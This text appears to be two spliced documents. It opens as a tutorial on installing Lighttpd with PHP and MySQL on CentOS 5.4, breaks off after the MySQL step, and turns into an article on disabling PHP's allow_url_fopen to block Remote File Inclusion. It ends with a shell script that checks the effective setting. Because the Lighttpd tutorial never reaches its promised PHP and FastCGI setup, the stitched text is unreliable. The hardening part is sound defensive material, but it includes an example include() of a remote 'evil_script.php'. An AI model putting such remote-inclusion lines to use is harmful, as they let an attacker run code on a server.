Lighttpd is an open-source web server optimized for speed-critical environments. It's standards-compliant, secure and flexible. In this tutorial I'll show you how to install Lighttpd on a CentOS 5.4 server with PHP5 support (through FastCGI) and MySQL support.
1. Installing MySQL 5 Server
To install MySQL run this command from the shell:
# yum install mysql mysql-server
Enable MySQL server on boot and start MySQL server:
# chkconfig --levels 235 mysqld on
# service mysqld start
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen (enabled by default)
This directive allows PHP's file functions (file_get_contents, include and require statements) to retrieve data from remote locations, such as FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can supply a URL under their control and have the server fetch and run their remote script. This vulnerability is called Remote File Inclusion (RFI).
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in Apache's httpd.conf:
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
With the directive off, PHP's file functions no longer accept URLs. A statement like include("http://www.example.com/evil_script.php") will fail instead of fetching and executing the remote file. Only local file paths can be included, for example include("/var/www/html/config.inc.php").
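
To confirm the hardening actually took effect, the following added example (not part of the original article) reports the effective allow_url_fopen value from a php.ini file and an Apache config, treating a php_admin_flag line as overriding php.ini. The function names and sample files are constructed for illustration, and the check assumes a flat config: it ignores <VirtualHost> and <Directory> scoping.

```shell
#!/bin/sh
# Added example: report the effective allow_url_fopen setting.

# Normalise a PHP boolean ini value to On/Off.
normalize_flag() {
    v=$(printf '%s' "$1" | tr -d "\"'" | tr '[:upper:]' '[:lower:]')
    case "$v" in
        on|yes|true) echo On ;;
        ''|*[!0-9]*) echo Off ;;
        *) if [ "$v" -ne 0 ]; then echo On; else echo Off; fi ;;
    esac
}

# php.ini: the last uncommented assignment wins; if the directive is absent,
# the built-in default (enabled) applies.
php_ini_url_fopen() {
    val=$(awk -F= '/^[ \t]*allow_url_fopen[ \t]*=/ {
              v = $2; sub(/;.*/, "", v); gsub(/[ \t\r]/, "", v); last = v; seen = 1 }
          END { if (!seen) last = "on"; print last }' "$1")
    normalize_flag "$val"
}

# Apache config: value forced by php_admin_flag, or empty output if none.
# Simplification (assumption): <VirtualHost>/<Directory> scoping is ignored.
apache_url_fopen() {
    val=$(awk 'tolower($1) == "php_admin_flag" && $2 == "allow_url_fopen" { last = $3; seen = 1 }
          END { if (seen) print last }' "$1")
    if [ -n "$val" ]; then normalize_flag "$val"; fi
}

# php_admin_flag overrides php.ini, so check it first.
effective_url_fopen() {
    forced=$(apache_url_fopen "$2")
    if [ -n "$forced" ]; then echo "$forced"; else php_ini_url_fopen "$1"; fi
}

# Constructed sample files (not from a real server).
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
printf '%s\n' '[PHP]' ';allow_url_fopen = Off' 'allow_url_fopen = On ; default' > "$tmp/php.ini"
printf '%s\n' '# hardening' 'php_admin_flag allow_url_fopen Off' > "$tmp/httpd.conf"
: > "$tmp/empty.conf"

echo "php.ini alone:       $(effective_url_fopen "$tmp/php.ini" "$tmp/empty.conf")"
echo "with php_admin_flag: $(effective_url_fopen "$tmp/php.ini" "$tmp/httpd.conf")"
```

The commented-out "Off" line in the sample php.ini is deliberately ignored: only the live "On" assignment counts, which is why the php.ini-only case still reports the directive as enabled.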